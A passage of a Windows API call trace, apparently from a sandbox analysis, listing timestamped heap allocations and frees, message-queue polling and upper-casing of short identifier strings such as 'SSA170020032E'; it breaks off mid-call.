1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0103.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0103.807] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0103.807] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9718 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0103.807] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0103.807] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0103.808] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0103.808] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0103.808] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74430 [0103.808] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0103.808] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.808] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0103.808] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0103.809] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0103.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9808 [0103.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0103.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96a0 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99b8 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0103.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99d0 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0103.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0103.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0103.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0103.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0103.811] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0103.811] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0103.811] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0103.812] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0103.812] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.812] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0103.812] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.812] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.812] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0103.812] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0103.812] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0103.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.813] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0103.813] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.813] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0103.813] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0103.813] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0103.813] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0103.813] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.813] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0103.813] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 